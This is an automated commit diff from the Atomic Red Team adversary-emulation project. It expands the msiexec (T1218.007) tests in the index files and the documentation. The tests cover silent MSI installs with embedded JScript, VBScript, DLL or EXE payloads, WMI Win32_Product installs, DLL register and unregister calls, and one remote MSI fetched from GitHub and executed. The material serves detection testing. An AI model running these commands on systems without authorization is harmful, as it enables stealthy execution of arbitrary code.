Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

atomics/Indexes/Indexes-CSV/index.csv

@@ -526,9 +526,17 @@ defense-evasion,T1218.005,Mshta,7,Invoke HTML Application - JScript Engine with
 defense-evasion,T1218.005,Mshta,8,Invoke HTML Application - JScript Engine with Inline Protocol Handler,d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840,powershell
 defense-evasion,T1218.005,Mshta,9,Invoke HTML Application - Simulate Lateral Movement over UNC Path,b8a8bdb2-7eae-490d-8251-d5e0295b2362,powershell
 defense-evasion,T1218.005,Mshta,10,Mshta used to Execute PowerShell,8707a805-2b76-4f32-b1c0-14e558205772,command_prompt
-defense-evasion,T1218.007,Msiexec,1,Msiexec.exe - Execute Local MSI file,0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8,command_prompt
-defense-evasion,T1218.007,Msiexec,2,Msiexec.exe - Execute Remote MSI file,bde7d2fe-d049-458d-a362-abda32a7e649,command_prompt
-defense-evasion,T1218.007,Msiexec,3,Msiexec.exe - Execute Arbitrary DLL,66f64bd5-7c35-4c24-953a-04ca30a0a0ec,command_prompt
+defense-evasion,T1218.007,Msiexec,1,Msiexec.exe - Execute Local MSI file with embedded JScript,a059b6c4-e7d6-4b2e-bcd7-9b2b33191a04,command_prompt
+defense-evasion,T1218.007,Msiexec,2,Msiexec.exe - Execute Local MSI file with embedded VBScript,8d73c7b0-c2b1-4ac1-881a-4aa644f76064,command_prompt
+defense-evasion,T1218.007,Msiexec,3,Msiexec.exe - Execute Local MSI file with an embedded DLL,628fa796-76c5-44c3-93aa-b9d8214fd568,command_prompt
+defense-evasion,T1218.007,Msiexec,4,Msiexec.exe - Execute Local MSI file with an embedded EXE,ed3fa08a-ca18-4009-973e-03d13014d0e8,command_prompt
+defense-evasion,T1218.007,Msiexec,5,WMI Win32_Product Class - Execute Local MSI file with embedded JScript,882082f0-27c6-4eec-a43c-9aa80bccdb30,powershell
+defense-evasion,T1218.007,Msiexec,6,WMI Win32_Product Class - Execute Local MSI file with embedded VBScript,cf470d9a-58e7-43e5-b0d2-805dffc05576,powershell
+defense-evasion,T1218.007,Msiexec,7,WMI Win32_Product Class - Execute Local MSI file with an embedded DLL,32eb3861-30da-4993-897a-42737152f5f8,powershell
+defense-evasion,T1218.007,Msiexec,8,WMI Win32_Product Class - Execute Local MSI file with an embedded EXE,55080eb0-49ae-4f55-a440-4167b7974f79,powershell
+defense-evasion,T1218.007,Msiexec,9,Msiexec.exe - Execute the DllRegisterServer function of a DLL,0106ffa5-fab6-4c7d-82e3-e6b8867d5e5d,command_prompt
+defense-evasion,T1218.007,Msiexec,10,Msiexec.exe - Execute the DllUnregisterServer function of a DLL,ab09ec85-4955-4f9c-b8e0-6851baf4d47f,command_prompt
+defense-evasion,T1218.007,Msiexec,11,Msiexec.exe - Execute Remote MSI file,44a4bedf-ffe3-452e-bee4-6925ab125662,command_prompt
 defense-evasion,T1564.004,NTFS File Attributes,1,Alternate Data Streams (ADS),8822c3b0-d9f9-4daf-a043-49f4602364f4,command_prompt
 defense-evasion,T1564.004,NTFS File Attributes,2,Store file in Alternate Data Stream (ADS),2ab75061-f5d5-4c1a-b666-ba2a50df5b02,powershell
 defense-evasion,T1564.004,NTFS File Attributes,3,Create ADS command prompt,17e7637a-ddaf-4a82-8622-377e20de8fdb,command_prompt

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -353,9 +353,17 @@ defense-evasion,T1218.005,Mshta,7,Invoke HTML Application - JScript Engine with
 defense-evasion,T1218.005,Mshta,8,Invoke HTML Application - JScript Engine with Inline Protocol Handler,d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840,powershell
 defense-evasion,T1218.005,Mshta,9,Invoke HTML Application - Simulate Lateral Movement over UNC Path,b8a8bdb2-7eae-490d-8251-d5e0295b2362,powershell
 defense-evasion,T1218.005,Mshta,10,Mshta used to Execute PowerShell,8707a805-2b76-4f32-b1c0-14e558205772,command_prompt
-defense-evasion,T1218.007,Msiexec,1,Msiexec.exe - Execute Local MSI file,0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8,command_prompt
-defense-evasion,T1218.007,Msiexec,2,Msiexec.exe - Execute Remote MSI file,bde7d2fe-d049-458d-a362-abda32a7e649,command_prompt
-defense-evasion,T1218.007,Msiexec,3,Msiexec.exe - Execute Arbitrary DLL,66f64bd5-7c35-4c24-953a-04ca30a0a0ec,command_prompt
+defense-evasion,T1218.007,Msiexec,1,Msiexec.exe - Execute Local MSI file with embedded JScript,a059b6c4-e7d6-4b2e-bcd7-9b2b33191a04,command_prompt
+defense-evasion,T1218.007,Msiexec,2,Msiexec.exe - Execute Local MSI file with embedded VBScript,8d73c7b0-c2b1-4ac1-881a-4aa644f76064,command_prompt
+defense-evasion,T1218.007,Msiexec,3,Msiexec.exe - Execute Local MSI file with an embedded DLL,628fa796-76c5-44c3-93aa-b9d8214fd568,command_prompt
+defense-evasion,T1218.007,Msiexec,4,Msiexec.exe - Execute Local MSI file with an embedded EXE,ed3fa08a-ca18-4009-973e-03d13014d0e8,command_prompt
+defense-evasion,T1218.007,Msiexec,5,WMI Win32_Product Class - Execute Local MSI file with embedded JScript,882082f0-27c6-4eec-a43c-9aa80bccdb30,powershell
+defense-evasion,T1218.007,Msiexec,6,WMI Win32_Product Class - Execute Local MSI file with embedded VBScript,cf470d9a-58e7-43e5-b0d2-805dffc05576,powershell
+defense-evasion,T1218.007,Msiexec,7,WMI Win32_Product Class - Execute Local MSI file with an embedded DLL,32eb3861-30da-4993-897a-42737152f5f8,powershell
+defense-evasion,T1218.007,Msiexec,8,WMI Win32_Product Class - Execute Local MSI file with an embedded EXE,55080eb0-49ae-4f55-a440-4167b7974f79,powershell
+defense-evasion,T1218.007,Msiexec,9,Msiexec.exe - Execute the DllRegisterServer function of a DLL,0106ffa5-fab6-4c7d-82e3-e6b8867d5e5d,command_prompt
+defense-evasion,T1218.007,Msiexec,10,Msiexec.exe - Execute the DllUnregisterServer function of a DLL,ab09ec85-4955-4f9c-b8e0-6851baf4d47f,command_prompt
+defense-evasion,T1218.007,Msiexec,11,Msiexec.exe - Execute Remote MSI file,44a4bedf-ffe3-452e-bee4-6925ab125662,command_prompt
 defense-evasion,T1564.004,NTFS File Attributes,1,Alternate Data Streams (ADS),8822c3b0-d9f9-4daf-a043-49f4602364f4,command_prompt
 defense-evasion,T1564.004,NTFS File Attributes,2,Store file in Alternate Data Stream (ADS),2ab75061-f5d5-4c1a-b666-ba2a50df5b02,powershell
 defense-evasion,T1564.004,NTFS File Attributes,3,Create ADS command prompt,17e7637a-ddaf-4a82-8622-377e20de8fdb,command_prompt

atomics/Indexes/Indexes-Markdown/index.md

@@ -812,9 +812,17 @@
   - Atomic Test #9: Invoke HTML Application - Simulate Lateral Movement over UNC Path [windows]
   - Atomic Test #10: Mshta used to Execute PowerShell [windows]
 - [T1218.007 Msiexec](../../T1218.007/T1218.007.md)
-  - Atomic Test #1: Msiexec.exe - Execute Local MSI file [windows]
-  - Atomic Test #2: Msiexec.exe - Execute Remote MSI file [windows]
-  - Atomic Test #3: Msiexec.exe - Execute Arbitrary DLL [windows]
+  - Atomic Test #1: Msiexec.exe - Execute Local MSI file with embedded JScript [windows]
+  - Atomic Test #2: Msiexec.exe - Execute Local MSI file with embedded VBScript [windows]
+  - Atomic Test #3: Msiexec.exe - Execute Local MSI file with an embedded DLL [windows]
+  - Atomic Test #4: Msiexec.exe - Execute Local MSI file with an embedded EXE [windows]
+  - Atomic Test #5: WMI Win32_Product Class - Execute Local MSI file with embedded JScript [windows]
+  - Atomic Test #6: WMI Win32_Product Class - Execute Local MSI file with embedded VBScript [windows]
+  - Atomic Test #7: WMI Win32_Product Class - Execute Local MSI file with an embedded DLL [windows]
+  - Atomic Test #8: WMI Win32_Product Class - Execute Local MSI file with an embedded EXE [windows]
+  - Atomic Test #9: Msiexec.exe - Execute the DllRegisterServer function of a DLL [windows]
+  - Atomic Test #10: Msiexec.exe - Execute the DllUnregisterServer function of a DLL [windows]
+  - Atomic Test #11: Msiexec.exe - Execute Remote MSI file [windows]
 - [T1564.004 NTFS File Attributes](../../T1564.004/T1564.004.md)
   - Atomic Test #1: Alternate Data Streams (ADS) [windows]
   - Atomic Test #2: Store file in Alternate Data Stream (ADS) [windows]

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -574,9 +574,17 @@
   - Atomic Test #9: Invoke HTML Application - Simulate Lateral Movement over UNC Path [windows]
   - Atomic Test #10: Mshta used to Execute PowerShell [windows]
 - [T1218.007 Msiexec](../../T1218.007/T1218.007.md)
-  - Atomic Test #1: Msiexec.exe - Execute Local MSI file [windows]
-  - Atomic Test #2: Msiexec.exe - Execute Remote MSI file [windows]
-  - Atomic Test #3: Msiexec.exe - Execute Arbitrary DLL [windows]
+  - Atomic Test #1: Msiexec.exe - Execute Local MSI file with embedded JScript [windows]
+  - Atomic Test #2: Msiexec.exe - Execute Local MSI file with embedded VBScript [windows]
+  - Atomic Test #3: Msiexec.exe - Execute Local MSI file with an embedded DLL [windows]
+  - Atomic Test #4: Msiexec.exe - Execute Local MSI file with an embedded EXE [windows]
+  - Atomic Test #5: WMI Win32_Product Class - Execute Local MSI file with embedded JScript [windows]
+  - Atomic Test #6: WMI Win32_Product Class - Execute Local MSI file with embedded VBScript [windows]
+  - Atomic Test #7: WMI Win32_Product Class - Execute Local MSI file with an embedded DLL [windows]
+  - Atomic Test #8: WMI Win32_Product Class - Execute Local MSI file with an embedded EXE [windows]
+  - Atomic Test #9: Msiexec.exe - Execute the DllRegisterServer function of a DLL [windows]
+  - Atomic Test #10: Msiexec.exe - Execute the DllUnregisterServer function of a DLL [windows]
+  - Atomic Test #11: Msiexec.exe - Execute Remote MSI file [windows]
 - [T1564.004 NTFS File Attributes](../../T1564.004/T1564.004.md)
   - Atomic Test #1: Alternate Data Streams (ADS) [windows]
   - Atomic Test #2: Store file in Alternate Data Stream (ADS) [windows]

atomics/Indexes/index.yaml

@@ -33879,10 +33879,9 @@ defense-evasion:
         source_name: Microsoft AlwaysInstallElevated 2018
       identifier: T1218.007
     atomic_tests:
-    - name: Msiexec.exe - Execute Local MSI file
-      auto_generated_guid: '0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8'
-      description: 'Execute arbitrary MSI file. Commonly seen in application installation.
-        The MSI opens notepad.exe when sucessfully executed.
+    - name: Msiexec.exe - Execute Local MSI file with embedded JScript
+      auto_generated_guid: a059b6c4-e7d6-4b2e-bcd7-9b2b33191a04
+      description: 'Executes an MSI containing embedded JScript code using msiexec.exe
 
 '
       supported_platforms:
@@ -33891,10 +33890,18 @@ defense-evasion:
         msi_payload:
           description: MSI file to execute
           type: Path
-          default: PathToAtomicsFolder\T1218.007\src\Win32\T1218.msi
+          default: PathToAtomicsFolder\T1218.007\src\T1218.007_JScript.msi
+        action:
+          description: 'Specifies the MSI action to perform: i (install), a (admin),
+            j (advertise). The included MSI is designed to support all three action
+            types.
+
+'
+          type: String
+          default: i
       dependency_executor_name: powershell
       dependencies:
-      - description: 'T1218.msi must exist on disk at specified location (#{msi_payload})
+      - description: 'The MSI file must exist on disk at specified location (#{msi_payload})
 
 '
         prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
@@ -33904,15 +33911,332 @@ defense-evasion:
 
 '
       executor:
-        command: 'msiexec.exe /q /i "#{msi_payload}"
+        command: 'msiexec.exe /q /#{action} "#{msi_payload}"
+
+'
+        name: command_prompt
+    - name: Msiexec.exe - Execute Local MSI file with embedded VBScript
+      auto_generated_guid: 8d73c7b0-c2b1-4ac1-881a-4aa644f76064
+      description: 'Executes an MSI containing embedded VBScript code using msiexec.exe
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        msi_payload:
+          description: MSI file to execute
+          type: Path
+          default: PathToAtomicsFolder\T1218.007\src\T1218.007_VBScript.msi
+        action:
+          description: 'Specifies the MSI action to perform: i (install), a (admin),
+            j (advertise). The included MSI is designed to support all three action
+            types.
+
+'
+          type: String
+          default: i
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The MSI file must exist on disk at specified location (#{msi_payload})
+
+'
+        prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: 'Write-Host "You must provide your own MSI"
+
+'
+      executor:
+        command: 'msiexec.exe /q /#{action} "#{msi_payload}"
+
+'
+        name: command_prompt
+    - name: Msiexec.exe - Execute Local MSI file with an embedded DLL
+      auto_generated_guid: 628fa796-76c5-44c3-93aa-b9d8214fd568
+      description: 'Executes an MSI containing an embedded DLL using msiexec.exe
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        msi_payload:
+          description: MSI file to execute
+          type: Path
+          default: PathToAtomicsFolder\T1218.007\src\T1218.007_DLL.msi
+        action:
+          description: 'Specifies the MSI action to perform: i (install), a (admin),
+            j (advertise). The included MSI is designed to support all three action
+            types.
+
+'
+          type: String
+          default: i
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The MSI file must exist on disk at specified location (#{msi_payload})
+
+'
+        prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: 'Write-Host "You must provide your own MSI"
+
+'
+      executor:
+        command: 'msiexec.exe /q /#{action} "#{msi_payload}"
+
+'
+        name: command_prompt
+    - name: Msiexec.exe - Execute Local MSI file with an embedded EXE
+      auto_generated_guid: ed3fa08a-ca18-4009-973e-03d13014d0e8
+      description: 'Executes an MSI containing an embedded EXE using msiexec.exe
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        msi_payload:
+          description: MSI file to execute
+          type: Path
+          default: PathToAtomicsFolder\T1218.007\src\T1218.007_EXE.msi
+        action:
+          description: 'Specifies the MSI action to perform: i (install), a (admin),
+            j (advertise). The included MSI is designed to support all three action
+            types.
+
+'
+          type: String
+          default: i
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The MSI file must exist on disk at specified location (#{msi_payload})
+
+'
+        prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: 'Write-Host "You must provide your own MSI"
+
+'
+      executor:
+        command: 'msiexec.exe /q /#{action} "#{msi_payload}"
+
+'
+        name: command_prompt
+    - name: WMI Win32_Product Class - Execute Local MSI file with embedded JScript
+      auto_generated_guid: 882082f0-27c6-4eec-a43c-9aa80bccdb30
+      description: 'Executes an MSI containing embedded JScript code using the WMI
+        Win32_Product class
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        msi_payload:
+          description: MSI file to execute
+          type: Path
+          default: PathToAtomicsFolder\T1218.007\src\T1218.007_JScript.msi
+        action:
+          description: 'Specifies the MSI action to perform: Install, Admin, Advertise.
+            The included MSI is designed to support all three action types.
+
+'
+          type: String
+          default: Install
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The MSI file must exist on disk at specified location (#{msi_payload})
+
+'
+        prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: 'Write-Host "You must provide your own MSI"
+
+'
+      executor:
+        command: 'Invoke-CimMethod -ClassName Win32_Product -MethodName #{action}
+          -Arguments @{ PackageLocation = ''#{msi_payload}'' }
+
+'
+        name: powershell
+    - name: WMI Win32_Product Class - Execute Local MSI file with embedded VBScript
+      auto_generated_guid: cf470d9a-58e7-43e5-b0d2-805dffc05576
+      description: 'Executes an MSI containing embedded VBScript code using the WMI
+        Win32_Product class
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        msi_payload:
+          description: MSI file to execute
+          type: Path
+          default: PathToAtomicsFolder\T1218.007\src\T1218.007_VBScript.msi
+        action:
+          description: 'Specifies the MSI action to perform: Install, Admin, Advertise.
+            The included MSI is designed to support all three action types.
+
+'
+          type: String
+          default: Install
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The MSI file must exist on disk at specified location (#{msi_payload})
+
+'
+        prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: 'Write-Host "You must provide your own MSI"
+
+'
+      executor:
+        command: 'Invoke-CimMethod -ClassName Win32_Product -MethodName #{action}
+          -Arguments @{ PackageLocation = ''#{msi_payload}'' }
+
+'
+        name: powershell
+    - name: WMI Win32_Product Class - Execute Local MSI file with an embedded DLL
+      auto_generated_guid: 32eb3861-30da-4993-897a-42737152f5f8
+      description: 'Executes an MSI containing an embedded DLL using the WMI Win32_Product
+        class
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        msi_payload:
+          description: MSI file to execute
+          type: Path
+          default: PathToAtomicsFolder\T1218.007\src\T1218.007_DLL.msi
+        action:
+          description: 'Specifies the MSI action to perform: Install, Admin, Advertise.
+            The included MSI is designed to support all three action types.
+
+'
+          type: String
+          default: Install
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The MSI file must exist on disk at specified location (#{msi_payload})
+
+'
+        prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: 'Write-Host "You must provide your own MSI"
+
+'
+      executor:
+        command: 'Invoke-CimMethod -ClassName Win32_Product -MethodName #{action}
+          -Arguments @{ PackageLocation = ''#{msi_payload}'' }
+
+'
+        name: powershell
+    - name: WMI Win32_Product Class - Execute Local MSI file with an embedded EXE
+      auto_generated_guid: 55080eb0-49ae-4f55-a440-4167b7974f79
+      description: 'Executes an MSI containing an embedded EXE using the WMI Win32_Product
+        class
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        msi_payload:
+          description: MSI file to execute
+          type: Path
+          default: PathToAtomicsFolder\T1218.007\src\T1218.007_EXE.msi
+        action:
+          description: 'Specifies the MSI action to perform: Install, Admin, Advertise.
+            The included MSI is designed to support all three action types.
+
+'
+          type: String
+          default: Install
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The MSI file must exist on disk at specified location (#{msi_payload})
+
+'
+        prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: 'Write-Host "You must provide your own MSI"
+
+'
+      executor:
+        command: 'Invoke-CimMethod -ClassName Win32_Product -MethodName #{action}
+          -Arguments @{ PackageLocation = ''#{msi_payload}'' }
+
+'
+        name: powershell
+    - name: Msiexec.exe - Execute the DllRegisterServer function of a DLL
+      auto_generated_guid: 0106ffa5-fab6-4c7d-82e3-e6b8867d5e5d
+      description: 'Loads a DLL into msiexec.exe and calls its DllRegisterServer function.
+        Note: the DLL included in the "src" folder is only built for 64-bit, so this
+        won''t work on a 32-bit OS.
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        dll_payload:
+          description: DLL to execute that has an implemented DllRegisterServer function
+          type: Path
+          default: PathToAtomicsFolder\T1218.007\src\MSIRunner.dll
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The DLL must exist on disk at specified location (#{dll_payload})
+
+'
+        prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: 'Write-Host "You must provide your own MSI"
+
+'
+      executor:
+        command: 'msiexec.exe /y "#{dll_payload}"
+
+'
+        name: command_prompt
+    - name: Msiexec.exe - Execute the DllUnregisterServer function of a DLL
+      auto_generated_guid: ab09ec85-4955-4f9c-b8e0-6851baf4d47f
+      description: 'Loads a DLL into msiexec.exe and calls its DllUnregisterServer
+        function. Note: the DLL included in the "src" folder is only built for 64-bit,
+        so this won''t work on a 32-bit OS.
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        dll_payload:
+          description: DLL to execute that has an implemented DllUnregisterServer
+            function
+          type: Path
+          default: PathToAtomicsFolder\T1218.007\src\MSIRunner.dll
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The DLL must exist on disk at specified location (#{dll_payload})
+
+'
+        prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: 'Write-Host "You must provide your own MSI"
+
+'
+      executor:
+        command: 'msiexec.exe /z "#{dll_payload}"
 
 '
         name: command_prompt
     - name: Msiexec.exe - Execute Remote MSI file
-      auto_generated_guid: bde7d2fe-d049-458d-a362-abda32a7e649
+      auto_generated_guid: 44a4bedf-ffe3-452e-bee4-6925ab125662
       description: 'Execute arbitrary MSI file retrieved remotely. Less commonly seen
-        in application installation, commonly seen in malware execution. The MSI opens
-        notepad.exe when sucessfully executed.
+        in application installation, commonly seen in malware execution. The MSI executes
+        a built-in JScript payload that launches powershell.exe.
 
 '
       supported_platforms:
@@ -33921,39 +34245,10 @@ defense-evasion:
         msi_payload:
           description: MSI file to execute
           type: String
-          default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/Win32/T1218.msi
+          default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/T1218.007_JScript.msi
       executor:
         command: 'msiexec.exe /q /i "#{msi_payload}"
 
-'
-        name: command_prompt
-    - name: Msiexec.exe - Execute Arbitrary DLL
-      auto_generated_guid: 66f64bd5-7c35-4c24-953a-04ca30a0a0ec
-      description: |
-        Execute arbitrary DLL file stored locally. Commonly seen in application installation.
-        Upon execution, a window titled "Boom!" will open that says "Locked and Loaded!". For 32 bit systems change the dll_payload argument to the Win32 folder.
-        By default, if the src folder is not in place, it will download the 64 bit version.
-      supported_platforms:
-      - windows
-      input_arguments:
-        dll_payload:
-          description: DLL to execute
-          type: Path
-          default: PathToAtomicsFolder\T1218.007\src\x64\T1218.dll
-      dependency_executor_name: powershell
-      dependencies:
-      - description: 'T1218.dll must exist on disk at specified location (#{dll_payload})
-
-'
-        prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
-
-'
-        get_prereq_command: |
-          New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
-          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/x64/T1218.dll" -OutFile "#{dll_payload}"
-      executor:
-        command: 'msiexec.exe /y "#{dll_payload}"
-
 '
         name: command_prompt
   T1564.004:

atomics/T1218.007/T1218.007.md

@@ -6,22 +6,38 @@ Adversaries may abuse msiexec.exe to launch local or network accessible MSI file
 
 ## Atomic Tests
 
-- [Atomic Test #1 - Msiexec.exe - Execute Local MSI file](#atomic-test-1---msiexecexe---execute-local-msi-file)
+- [Atomic Test #1 - Msiexec.exe - Execute Local MSI file with embedded JScript](#atomic-test-1---msiexecexe---execute-local-msi-file-with-embedded-jscript)
 
-- [Atomic Test #2 - Msiexec.exe - Execute Remote MSI file](#atomic-test-2---msiexecexe---execute-remote-msi-file)
+- [Atomic Test #2 - Msiexec.exe - Execute Local MSI file with embedded VBScript](#atomic-test-2---msiexecexe---execute-local-msi-file-with-embedded-vbscript)
 
-- [Atomic Test #3 - Msiexec.exe - Execute Arbitrary DLL](#atomic-test-3---msiexecexe---execute-arbitrary-dll)
+- [Atomic Test #3 - Msiexec.exe - Execute Local MSI file with an embedded DLL](#atomic-test-3---msiexecexe---execute-local-msi-file-with-an-embedded-dll)
+
+- [Atomic Test #4 - Msiexec.exe - Execute Local MSI file with an embedded EXE](#atomic-test-4---msiexecexe---execute-local-msi-file-with-an-embedded-exe)
+
+- [Atomic Test #5 - WMI Win32_Product Class - Execute Local MSI file with embedded JScript](#atomic-test-5---wmi-win32_product-class---execute-local-msi-file-with-embedded-jscript)
+
+- [Atomic Test #6 - WMI Win32_Product Class - Execute Local MSI file with embedded VBScript](#atomic-test-6---wmi-win32_product-class---execute-local-msi-file-with-embedded-vbscript)
+
+- [Atomic Test #7 - WMI Win32_Product Class - Execute Local MSI file with an embedded DLL](#atomic-test-7---wmi-win32_product-class---execute-local-msi-file-with-an-embedded-dll)
+
+- [Atomic Test #8 - WMI Win32_Product Class - Execute Local MSI file with an embedded EXE](#atomic-test-8---wmi-win32_product-class---execute-local-msi-file-with-an-embedded-exe)
+
+- [Atomic Test #9 - Msiexec.exe - Execute the DllRegisterServer function of a DLL](#atomic-test-9---msiexecexe---execute-the-dllregisterserver-function-of-a-dll)
+
+- [Atomic Test #10 - Msiexec.exe - Execute the DllUnregisterServer function of a DLL](#atomic-test-10---msiexecexe---execute-the-dllunregisterserver-function-of-a-dll)
+
+- [Atomic Test #11 - Msiexec.exe - Execute Remote MSI file](#atomic-test-11---msiexecexe---execute-remote-msi-file)
 
 
 <br/>
 
-## Atomic Test #1 - Msiexec.exe - Execute Local MSI file
-Execute arbitrary MSI file. Commonly seen in application installation. The MSI opens notepad.exe when sucessfully executed.
+## Atomic Test #1 - Msiexec.exe - Execute Local MSI file with embedded JScript
+Executes an MSI containing embedded JScript code using msiexec.exe
 
 **Supported Platforms:** Windows
 
 
-**auto_generated_guid:** 0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8
+**auto_generated_guid:** a059b6c4-e7d6-4b2e-bcd7-9b2b33191a04
 
 
 
@@ -30,21 +46,22 @@ Execute arbitrary MSI file. Commonly seen in application installation. The MSI o
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| msi_payload | MSI file to execute | Path | PathToAtomicsFolder&#92;T1218.007&#92;src&#92;Win32&#92;T1218.msi|
+| msi_payload | MSI file to execute | Path | PathToAtomicsFolder&#92;T1218.007&#92;src&#92;T1218.007_JScript.msi|
+| action | Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types. | String | i|
 
 
 #### Attack Commands: Run with `command_prompt`! 
 
 
 ```cmd
-msiexec.exe /q /i "#{msi_payload}"
+msiexec.exe /q /#{action} "#{msi_payload}"
 ```
 
 
 
 
 #### Dependencies:  Run with `powershell`!
-##### Description: T1218.msi must exist on disk at specified location (#{msi_payload})
+##### Description: The MSI file must exist on disk at specified location (#{msi_payload})
 ##### Check Prereq Commands:
 ```powershell
 if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
@@ -60,13 +77,13 @@ Write-Host "You must provide your own MSI"
 <br/>
 <br/>
 
-## Atomic Test #2 - Msiexec.exe - Execute Remote MSI file
-Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution. The MSI opens notepad.exe when sucessfully executed.
+## Atomic Test #2 - Msiexec.exe - Execute Local MSI file with embedded VBScript
+Executes an MSI containing embedded VBScript code using msiexec.exe
 
 **Supported Platforms:** Windows
 
 
-**auto_generated_guid:** bde7d2fe-d049-458d-a362-abda32a7e649
+**auto_generated_guid:** 8d73c7b0-c2b1-4ac1-881a-4aa644f76064
 
 
 
@@ -75,7 +92,419 @@ Execute arbitrary MSI file retrieved remotely. Less commonly seen in application
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| msi_payload | MSI file to execute | String | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/Win32/T1218.msi|
+| msi_payload | MSI file to execute | Path | PathToAtomicsFolder&#92;T1218.007&#92;src&#92;T1218.007_VBScript.msi|
+| action | Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types. | String | i|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+msiexec.exe /q /#{action} "#{msi_payload}"
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: The MSI file must exist on disk at specified location (#{msi_payload})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "You must provide your own MSI"
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #3 - Msiexec.exe - Execute Local MSI file with an embedded DLL
+Executes an MSI containing an embedded DLL using msiexec.exe
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 628fa796-76c5-44c3-93aa-b9d8214fd568
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| msi_payload | MSI file to execute | Path | PathToAtomicsFolder&#92;T1218.007&#92;src&#92;T1218.007_DLL.msi|
+| action | Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types. | String | i|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+msiexec.exe /q /#{action} "#{msi_payload}"
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: The MSI file must exist on disk at specified location (#{msi_payload})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "You must provide your own MSI"
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #4 - Msiexec.exe - Execute Local MSI file with an embedded EXE
+Executes an MSI containing an embedded EXE using msiexec.exe
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** ed3fa08a-ca18-4009-973e-03d13014d0e8
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| msi_payload | MSI file to execute | Path | PathToAtomicsFolder&#92;T1218.007&#92;src&#92;T1218.007_EXE.msi|
+| action | Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types. | String | i|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+msiexec.exe /q /#{action} "#{msi_payload}"
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: The MSI file must exist on disk at specified location (#{msi_payload})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "You must provide your own MSI"
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #5 - WMI Win32_Product Class - Execute Local MSI file with embedded JScript
